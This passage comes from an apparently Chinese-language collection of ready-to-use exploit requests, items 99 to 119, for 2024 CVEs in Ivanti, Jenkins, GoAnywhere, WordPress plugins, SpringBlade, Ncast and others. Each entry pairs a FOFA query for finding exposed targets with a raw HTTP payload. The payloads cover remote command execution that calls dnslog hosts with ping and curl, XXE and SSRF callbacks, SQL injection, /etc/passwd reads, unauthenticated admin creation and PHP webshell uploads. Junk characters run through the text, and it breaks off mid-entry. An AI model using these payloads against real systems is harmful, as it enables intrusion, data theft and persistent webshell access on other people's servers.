Accept: */*# ~6 K+ I/ I$ k/ e# O+ k
Accept-Encoding: gzip, deflate
& m/ O% W" ]) b n* f- ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 N" Q1 i- e7 w
Content-Type: application/x-www-form-urlencoded; charset=UTF-8; o) M. m# v/ }$ e9 ?& b
X-Requested-With: XMLHttpRequest
6 h3 z1 l# Z3 V, W) w2 t" o! ~ v7 Y* K
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
0 u" E% G$ G! g z1 @! d( Y2 u/ A0 {" g! U
8 d/ W4 p9 J/ L; X2 G
99. Ncast盈可视高清智能录播系统busiFacade RCE
6 w1 q% f& [2 C0 ~- X1 SCVE-2024-0305, X* K4 n& r5 d& e* x
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
) z# j# ^0 }/ o" YPOST /classes/common/busiFacade.php HTTP/1.1% L- A! ]! U) m5 ^% m
Host: 192.168.40.130:8080
( y8 _# L; f$ D8 D) E* \# ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: v% z7 S7 S" @% ~7 LConnection: close0 Q+ R. d m- [( @) f
Content-Length: 154
2 r( ?9 k0 A9 K5 V8 |. |Accept: */*
* o: P n& Y% j; y KAccept-Encoding: gzip, deflate
; k; s* M( _& W( P% f1 ?, zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- A6 o! L. H# `: h5 @2 A+ a. A
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3 n. J( r! f# o, IX-Requested-With: XMLHttpRequest
( ]7 [+ f: a& v" s# ?" y' Z
/ `7 G! {3 H0 ~) b! H: B%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
* z6 ?3 D' U- D# y" I: K( ~
2 i$ G. v: X) p3 c* O. K' [
7 X1 n+ Q F! ?$ }3 P2 r100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
a2 ~4 D0 l* S, R& NCVE-2024-0352
% M3 g) y6 M: M) Z6 |- M' TFOFA:icon_hash="874152924"4 {( X5 g0 P& ^* X
POST /api/file/formimage HTTP/1.1
$ D6 s/ B. z( x1 r+ w5 IHost: 192.168.40.130' j2 S! a7 i4 D7 z# F4 }
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
0 Q; b4 X& i- a" F( V! lConnection: close( K/ O" A4 ~5 p/ _" [
Content-Length: 201: d5 \8 d2 _5 O# h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei, i/ j; [% S) B9 U: [0 L
Accept-Encoding: gzip
6 f4 h7 s6 K+ Z+ g8 m3 q' C8 X! i, B1 @4 e; f( q
------WebKitFormBoundarygcflwtei
2 u2 X/ Q- ?+ N& |! p& ]" J& V$ XContent-Disposition: form-data; name="file";filename="IE4MGP.php"
- d3 }6 ^4 S2 S7 dContent-Type: application/x-php$ }% ?4 {# B) w* U: o7 ~, Q5 d
9 {: ^" J( U V2ayyhRXiAsKXL8olvF5s4qqyI2O4 f& U- q, H ~: [# S- `2 C
------WebKitFormBoundarygcflwtei--
& D1 }2 s/ I" j& O: Y0 r8 _
% @7 V! K0 U) I) E- Y( l8 O9 x2 y9 E/ Y8 X% ] {4 [ l& [
101. ivanti policy secure-22.6命令注入- Q/ G! P5 G& y' q
CVE-2024-21887
& L( r1 F! H% KFOFA:body="welcome.cgi?p=logo"
: k/ x) J/ T3 m3 r0 f1 hGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1# O% G$ ~ E1 R( e2 w! A
Host: x.x.x.xx.x.x.x
$ T; L0 h' m4 c. K0 AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
}0 r" b: v& C# b, l. f& S! BConnection: close b( O4 d. }4 z/ m- ]' |0 P4 S+ r
Accept-Encoding: gzip7 j3 u& S: Q7 |! Y0 ~' S
0 P# }$ H4 \$ E, V, G5 e7 Q) E$ `
9 ?" d& F# b4 { c1 X9 @) N, d102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
9 U6 l$ j# |) i' w2 {7 YCVE-2024-21893
# S' c( g4 ]+ S3 U8 a; V+ ZFOFA:body="welcome.cgi?p=logo": {& l+ M& v4 T7 }0 R( N8 N
POST /dana-ws/saml20.ws HTTP/1.1
" N8 p) W, C! ?$ s$ NHost: x.x.x.x7 E+ R" V! Z+ @" N0 p% o& e( Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* l/ |' J* E9 z! U
Connection: close/ r8 k& [4 e% p* P' F' b6 x
Content-Length: 7928 }+ F: N$ W; L1 x1 c
Accept-Encoding: gzip
5 }" p' @/ t' S0 X
- a* T3 {! u: u<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>4 V! C; e/ x6 f1 i% S; G& B+ D
2 D1 W$ z) i8 b103. Ivanti Pulse Connect Secure VPN XXE
, W) l" ]1 h+ E5 b$ m1 p% dCVE-2024-220246 p# N4 I2 P0 @4 M- t# |$ Z4 b
FOFA:body="welcome.cgi?p=logo"" P! H& N6 k0 O. z
POST /dana-na/auth/saml-sso.cgi HTTP/1.1) }9 h( m4 K9 e0 q. g5 l
Host: 192.168.40.130:111; ~: Q; m/ N' E' J+ G
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
/ }- q& i$ L" g' L6 R6 h- HConnection: close
3 D2 T$ ]0 u, x% I4 W+ C6 ^Content-Length: 204
: I4 M8 b% Z6 R3 c6 q) OContent-Type: application/x-www-form-urlencoded
- _9 M! ?; D) g# U" LAccept-Encoding: gzip9 [$ E) }6 o/ K, H
: R1 H2 \% n8 ~! r& \' o, \
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
0 |2 U! S; f( p& X) w, S. Y* b! {+ \- \' `* n! F
4 e& l" u% h+ y1 K
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
* n2 u2 u; ^, O* x<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>, U( a8 P. W: J# Y
) m4 [! W$ A7 ^% r% o: q' A1 N
6 U3 U2 e: ?+ `' X! F$ \104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
. x, R' ]' E0 _4 j$ RCVE-2024-0569
8 }3 m. c! K6 n6 YFOFA:title="TOTOLINK"
0 ?8 J, O5 q) }# d& y) ^/ n/ GPOST /cgi-bin/cstecgi.cgi HTTP/1.15 j0 |* Z7 G4 C4 P& C0 I
Host:192.168.0.1
2 K0 I$ Y% T' u# n. KContent-Length:41; \, O( x) N8 S' Y0 V t( F, o7 K+ v+ R
Accept:application/json,text/javascript,*/*;q=0.01- d7 S4 i" x% ]
X-Requested-with: XMLHttpRequest
* P0 ^& a8 J( F4 f: J+ Y9 lUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
8 s- v% ^* G: h8 Z( [& W2 p6 W: sContent-Type: application/x-www-form-urlencoded:charset=UTF-84 P- z J3 e; ]3 W
Origin: http://192.168.0.1
/ U4 B7 ]3 E# T3 g3 v; gReferer: http://192.168.0.1/advance/index.html?time=1671152380564
' i4 \/ l l- P0 U h3 M1 qAccept-Encoding:gzip,deflate
! R0 |0 m* `7 X. [! k- t1 BAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7. L0 J, D% O) D5 p, S0 r
Connection:close
/ t) b, q$ v3 J% d' h5 x
! ?% M$ F- h! O) \3 \) z, o, H* }{' }5 ?8 X7 \) C, J
"topicurl":"getSysStatusCfg",
! J! B) j: q% R# A"token":""
4 p) ^. d7 `1 n- t- F. W}& }7 s4 ^/ ?, U# k$ J- l6 X7 k
8 a0 ?8 S% R3 a7 {* y105. SpringBlade v3.2.0 export-user SQL 注入" H" @9 }4 v& |9 Q1 J
FOFA:body="https://bladex.vip"; s+ P% W8 m; Y' S
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
& W) c t1 _" v" n1 W- X" i
! m5 z" l) G1 N& X& m/ N) v9 A( H106. SpringBlade dict-biz/list SQL 注入
5 Q! L( A- E' S/ Q- h" b2 R, IFOFA:body="Saber 将不能正常工作"
7 a1 B. ~5 L/ S7 M$ jGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" c7 _8 ?# `1 O. b
Host: your-ip
7 S1 Z& Y. V( i; iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* r' L" H1 [& o# L SBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A1 t* p0 z' ^+ q9 H1 |
Accept-Encoding: gzip, deflate
# S" p Y- {7 _% p2 ~Accept-Language: zh-CN,zh;q=0.9
* n! W" u, d. Q: h% T/ pConnection: close7 G7 q% I9 I; Y$ Y# P# j2 P" Q; j
) l1 [; B; x+ ?+ B
0 y$ ]7 y7 T: U3 v! ]. S! n/ K6 ?
107. SpringBlade tenant/list SQL 注入 I! Y& i6 e( v: j
FOFA:body="https://bladex.vip"
& p% i, ^$ I d+ J: z! `7 sGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
+ l. x# J( W3 y6 l, D, [Host: your-ip
8 {& e8 B2 @7 g" O4 ?" zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- ^0 Y8 Z$ ~" k ?Blade-Auth:替换为自己的 P( R" E& h+ n0 I! v$ }
Connection: close
" s) x0 z" f6 T9 U8 S. T: L
+ \( ?* _7 O, a$ y8 S" [+ B: q; E; f
$ ~$ E0 Y5 C$ i( N) @, _" E# f6 M108. D-Tale 3.9.0 SSRF
6 O9 P' F/ {7 SCVE-2024-21642
# \8 i! U1 v! w% H& t. FFOFA:"dtale/static/images/favicon.png"
/ n! x3 ?5 p5 R5 i+ z: R. w QGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1' J' Y: H2 g4 H3 j/ y8 g
Host: your-ip2 ?& R5 ?# [: V& m# J- w( M5 T
Accept: application/json, text/plain, */*
9 c! J' G( a& U3 ~/ [: E' _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; r- v7 C9 [! J( E5 GAccept-Encoding: gzip, deflate
" j! h% }; P: O& v+ aAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
/ M( y3 @/ A3 }8 ]6 y1 d* i) X) B6 NConnection: close
9 G( ]% V* ?7 [ H- X) B9 Y6 T
! A4 ?: o! ~' L6 V" ~
: H o' O" _$ s% k3 ?2 D8 E109. Jenkins CLI 任意文件读取) F, e1 p f( v$ ^' G9 q
CVE-2024-23897& I: k9 G# c: U; p2 o# u& Q
FOFA:header="X-Jenkins"& u3 u1 u) ]( E8 |3 n6 _
POST /cli?remoting=false HTTP/1.1" i1 R! y2 ~' O; x/ e$ _1 I6 F
Host:* n8 x+ z9 q, p. }8 K. k# [
Content-type: application/octet-stream
# Z0 w$ X) |7 d: gSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e923 J1 z d5 x; p; R* W7 C
Side: upload2 w' X" v: I/ u. b
Connection: keep-alive6 N6 e T, X2 b. X1 K* X) i
Content-Length: 163
* o( k9 Z+ i* O3 y3 }" ?9 R1 [2 p/ p/ z* X; e
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
+ x7 F' m' k) ^ D" l( |/ `
. v" k7 u* E+ _! L: G+ f0 A: j9 x& x8 F& L+ Y
POST /cli?remoting=false HTTP/1.10 ?' i0 ^0 |( D7 ~% T- K5 m
Host:
! v; M% f) O1 X, a4 i* VSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
6 x/ |7 z0 n# Cdownload' V8 a' V5 q0 w4 P' g7 a
Content-Type: application/x-www-form-urlencoded
3 ^3 K+ V" `7 |# P$ Y+ w5 fContent-Length: 0
6 z- p* H# e, v, U' G( M
3 I8 a Y# m9 [
% E. L+ a' g2 N B1 v. ]: [ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" q7 |0 Y% x t
java -jar jenkins-cli.jar help
# J6 E8 a4 q5 v[COMMAND]
& u4 c A" r0 ]% \Lists all the available commands or a detailed description of single command.: G8 k" b/ {; Q6 C
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)6 z: B# w; t/ U
) X' L+ P6 c, P! g$ `
2 Q4 f% F/ y- _2 F1 E110. Goanywhere MFT 未授权创建管理员
: S4 C3 x& s. ~$ N8 V5 HCVE-2024-0204
' {5 H, D2 ~ {1 z, h! XFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
5 l( d5 [1 Q5 T2 RGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
_& l% Z5 Q! H( u2 f+ f; G! KHost: 192.168.40.130:80007 D' A3 d; t q! h
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
# Z* J- e0 b3 \) R* ^/ EConnection: close) Y9 Z1 R# p! n% K8 J B
Accept: */*
( i1 J; `1 i3 d$ E( i" x0 X9 lAccept-Language: en
" E/ [. c; |9 ]4 }- r8 B, MAccept-Encoding: gzip. _5 O) {9 j9 r- d1 @$ L- T+ q* Z
- g/ M. d1 p0 n, S7 i3 i* S f8 n: l& e, Q# V/ {. _
111. WordPress Plugin HTML5 Video Player SQL注入/ `4 D7 s! J) b# K0 [$ V+ r( j
CVE-2024-10618 K* {) V" h) w- b5 l
FOFA:"wordpress" && body="html5-video-player"
# N1 }# j- ^4 L8 F& c0 D6 t+ hGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
5 j# j5 d) ?9 {( Z4 VHost: 192.168.40.130:112
7 j2 Z- g0 m; j% i9 J, U) J3 |User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& C( s& m3 l& d- dConnection: close; p: v4 g: L b* t1 {
Accept: */*$ a+ y% ?% N8 x8 \/ q5 I
Accept-Language: en( ]1 d+ \& W# o' Z) g4 V7 R, Z
Accept-Encoding: gzip, k5 _8 w) H, W& c
/ ^: u7 l) p) J; U5 h8 \7 \
# N7 x; R3 [% y9 s+ e; @' l
112. WordPress Plugin NotificationX SQL 注入
) d1 A' ]0 [" {( FCVE-2024-1698) r+ g' ]( V( j# B" m7 P
FOFA:body="/wp-content/plugins/notificationx"
2 [# t$ ~8 m' RPOST /wp-json/notificationx/v1/analytics HTTP/1.1: ~" a! `- J0 l$ S
Host: {{Hostname}}6 q& Q f3 p5 \
Content-Type: application/json6 q' |$ l/ K4 ^! q' A1 U: y- B
+ ` r Z/ X/ `6 b{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
4 M7 O& c# g" [# ]7 m) P, A
1 b" i9 X! y v2 |$ A3 G
! k4 q4 \! S" ^9 Z* T0 l113. WordPress Automatic 插件任意文件下载和SSRF
% m' I$ S6 s: X2 W* Y3 C# c$ {CVE-2024-27954
: `, o2 o, E; B9 R7 E e5 BFOFA:"/wp-content/plugins/wp-automatic"1 H3 p! I4 V; h$ a8 Y$ r* T }
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
; O# |/ {* M4 y) \% DHost: x.x.x.x5 Z! X2 T R$ y. J
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36$ U/ Z' }0 B9 E U) z$ Y6 y( ?
Connection: close( ]; I2 F0 v9 L" M3 t
Accept: */*8 o/ y8 l% g6 S# X/ y
Accept-Language: en& f; v0 w9 Z j0 x1 P! w. D
Accept-Encoding: gzip0 j( ?1 p* i6 }
6 v: m6 n+ k; R: C; ^/ H; Q
* w2 e$ D8 E1 K114. WordPress MasterStudy LMS插件 SQL注入1 d* h* P7 i; c+ a
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
6 E# C2 A- X3 w! J) g' VGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
' Z+ u; O' q) e' FHost: your-ip/ k& L6 b+ c! ?' k
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.366 U( S: Q L, t& `9 T2 O, v
Accept-Charset: utf-8
5 {. V: l5 }% h: ]) i& zAccept-Encoding: gzip, deflate* x {0 K- m2 s$ H0 H
Connection: close, c P$ l. K4 H8 z! o& d4 m2 i; y
6 u/ X0 M) K @" E6 n, {
" L6 e6 n3 M' p. B4 q115. WordPress Bricks Builder <= 1.9.6 RCE
q* A7 }4 w; ^, ]) V. B rCVE-2024-25600
+ ]+ k0 _1 @2 l+ j4 TFOFA: body="/wp-content/themes/bricks/"/ {8 B8 s- }( _
第一步,获取网站的nonce值5 ]/ `7 I" s9 `6 ]9 [4 j/ c
GET / HTTP/1.1
9 \9 r& e6 q7 K. y- B* a+ UHost: x.x.x.x3 l+ v/ H! T5 S! l& z8 ?1 u
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
" c1 r1 |/ q% L& }5 o7 mConnection: close
V0 ~6 B; ~. @$ lAccept-Encoding: gzip
( I+ l2 Y* b: C% h& B! x( i9 F3 Z) b* }. q
7 O: O0 s; A% V% |: }. ~. A ~
第二步替换nonce值,执行命令
; T6 R# Q5 }7 Q! x8 ~5 M' o3 ^" fPOST /wp-json/bricks/v1/render_element HTTP/1.1- b* s# \3 P' W8 N1 U7 v8 l& Z
Host: x.x.x.x4 {, Z2 S% ~" |: I) e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. [* i) d3 k7 Y2 ~- Z5 Z4 v
Connection: close
3 {6 |7 p) l. n8 {Content-Length: 3567 i7 W' q" A4 a1 u5 V) l* ^
Content-Type: application/json' \6 K, J& D! ^, p0 J
Accept-Encoding: gzip, _4 q# X$ J# ]/ V1 |* u
. B) U; G; v8 P/ I. R0 N& Z
{
0 `1 Z9 W" ^4 M! P"postId": "1",* N6 J9 z+ `5 Z! Q# `
"nonce": "第一步获得的值",
; y, J; V3 x2 ^# a; r( h "element": {
' [. Y8 Y) N$ K! L0 D. q# |; I B "name": "container",
" ^5 p+ X3 a- e% U E; ~ "settings": {
. E6 [4 |: a, f! p- e( E "hasLoop": "true",
$ B6 o& d! w' p; Z3 z2 h "query": {
+ T# S* E- G: A1 R* N9 N& O+ e' F "useQueryEditor": true,, W2 l8 O$ n1 k6 K
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",- z- G6 q; B0 N8 g
"objectType": "post"# I$ ~; J' C% `. ~$ M2 X7 T7 ~
}
6 a/ [) z& S3 u }
# h0 z3 V# [5 c" \ }
1 J; r' {1 Z/ i: [! y- G0 V} }% Z. _ ~4 X1 i. n! @) W: A9 R
+ r& g# R* m! z2 F D! [
1 T+ e+ Y, f0 Y$ k: A5 @0 y: a116. wordpress js-support-ticket文件上传! c3 G2 D$ b1 l1 u; S* G
FOFA:body="wp-content/plugins/js-support-ticket"0 Q8 j+ u) P/ G' [6 x
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.13 X- a& I$ j: E: f }
Host:
# Y: ? V1 c8 f' kContent-Type: multipart/form-data; boundary=--------767099171
/ y8 l; w, m8 P# u! O' WUser-Agent: Mozilla/5.0" u9 y# b' [( n ^; Q3 U. i/ |
$ P8 Y Q& [' r7 t- }* ~
----------767099171) Q) J$ O% l7 E
Content-Disposition: form-data; name="action"
6 W Q& N. R4 m# `configuration_saveconfiguration
- a* y" ?8 w! B4 P3 h/ d----------767099171
) c1 l$ d( W/ a. x& \Content-Disposition: form-data; name="form_request"( h/ H2 E0 H: P/ @! _5 D
jssupportticket
5 \3 B- r! Y, l3 b: W6 ^* |/ d----------767099171# m3 F8 @9 h4 c) [/ t9 h- C
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"* m) t8 q7 R3 q" p6 N) e
Content-Type: image/png7 y& f9 e, Z2 T; K) H7 m1 R
----------767099171--
. S+ D. O& X/ V2 w# n
* J- t7 \9 `! W Y! @2 B1 G1 |$ a
- | z+ G4 b5 l: I) U6 m4 J117. WordPress LayerSlider插件SQL注入, {5 ?3 F: ~3 D2 m; b+ ]0 U `
version:7.9.11 – 7.10.0
/ M* n# l# y. I) |" E* ^FOFA:body="/wp-content/plugins/LayerSlider/"- K+ s+ h P/ U/ q4 N% q7 O
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.12 ~5 k$ G& v4 |8 n4 q1 O. M
Host: your-ip
5 ^/ L' {8 [: B& mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 a( i ]6 z, sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 l$ B* n5 Q K' t! E8 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 @( @' G3 m: }1 H( X& mAccept-Encoding: gzip, deflate, br
, L3 q$ Q; q5 T% U1 ZConnection: close# c0 a0 w* F7 F2 V O
Upgrade-Insecure-Requests: 1
5 @3 {2 J. K+ f2 S. K
. X1 F2 K! m( u
. j* G X/ B7 [118. 北京百绰智能S210管理平台uploadfile.php任意文件上传" n' q0 R8 Z( f/ D. g
CVE-2024-0939
/ A) e+ \1 q/ ]* ?FOFA:title="Smart管理平台"
8 g9 z3 |3 f( i4 C: H" @2 o( ~POST /Tool/uploadfile.php? HTTP/1.1
0 R9 w3 l8 V! \* YHost: 192.168.40.130:8443
& f0 x6 ^; Q, w, X6 vCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
* l5 x. d' t. f) oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
5 z/ g1 Q0 @# f3 C" |9 t, }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, s0 P* h8 B) Z V' D& A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' S, R* |9 A, m" s5 DAccept-Encoding: gzip, deflate
/ Q9 D8 L, m5 n! E! [Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
0 F( r* W: t5 ?# Q! o9 IContent-Length: 405
- e" O3 _) N9 s/ C) `, `; TOrigin: https://192.168.40.130:8443
8 u% ^! J/ G* S& o0 sReferer: https://192.168.40.130:8443/Tool/uploadfile.php
( L0 o/ u6 y0 q/ g9 |3 X4 tUpgrade-Insecure-Requests: 1
: M5 ^8 ^/ f! R) FSec-Fetch-Dest: document
8 G }& [7 W) F w' ~ a. dSec-Fetch-Mode: navigate/ m' m% H& l8 a
Sec-Fetch-Site: same-origin
2 A* j" }5 ?& g) Z0 ~' qSec-Fetch-User: ?1 v. { l& p$ o$ l2 e* C
Te: trailers. s4 Z' e$ a3 |. v' J5 L) ^
Connection: close& D+ ~# I, l& `3 _; |# Z
9 V: ?0 t% j, b) ?1 C) G: ?( e
-----------------------------13979701222747646634037182887
! G6 G$ T. e6 f* @! H4 OContent-Disposition: form-data; name="file_upload"; filename="contents.php"% F( n1 ?5 S+ E D3 e; H
Content-Type: application/octet-stream2 [, A4 j) x# p" X' a. u
1 h" x: S5 Q7 e$ r! m0 G$ h6 K
<?php
2 M3 F7 o3 p, x9 K) Rsystem($_POST["passwd"]);6 ?3 c* U6 e% w
?># ~. ]0 L# s, k" ]7 _7 l
-----------------------------13979701222747646634037182887' A. }( U" Z( G+ z5 m' m, x
Content-Disposition: form-data; name="txt_path"
e# _. s- c, M3 y0 S& M8 d$ O2 w$ n5 y/ i* |# h+ i
/home/src.php; O% b+ `, D* Z6 I! F" T& e
-----------------------------13979701222747646634037182887--3 C7 v! m# [, [1 i* U, Z
, ?& k' _8 y3 S3 b, D8 f" Y4 M1 G4 l" z8 F; H
访问/home/src.php, P; e0 |0 Y4 c# F
/ V2 t. _2 W8 D9 D119. 北京百绰智能S20后台sysmanageajax.php sql注入0 w5 S& U5 X: |* w, ]# u. {
CVE-2024-1254
7 t) m0 C! y% Y! r4 ^' JFOFA:title="Smart管理平台"/ d8 H% z: z- f
先登录进入系统,默认账号密码为admin/admin
* f. S! c. t1 l5 I" S4 @) {1 h# sPOST /sysmanage/sysmanageajax.php HTTP/1.11
0 {' G8 O7 H/ XHost: x.x.x.x
0 W* l& B+ {) B2 }, JCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee7 Z9 M" J- A( n8 O; @+ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0- Y9 r3 j5 C1 G& j# V' t* M
Accept: */*
/ J- ^' z. z$ h$ E/ z7 \8 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( J; i/ V2 x$ b3 l' T; G5 zAccept-Encoding: gzip, deflate6 j! m2 W0 J2 y7 t) c
Content-Type: application/x-www-form-urlencoded;+ }% \) M, V% S2 Q
Content-Length: 109( `+ o1 F3 t% |% w; A5 {
Origin: https://58.18.133.60:8443
+ V5 [/ r* F: I5 PReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php& _3 b3 |3 L7 e
Sec-Fetch-Dest: empty
$ L) J2 }3 M# J; v& ]6 vSec-Fetch-Mode: cors8 m, a" U0 @& @
Sec-Fetch-Site: same-origin
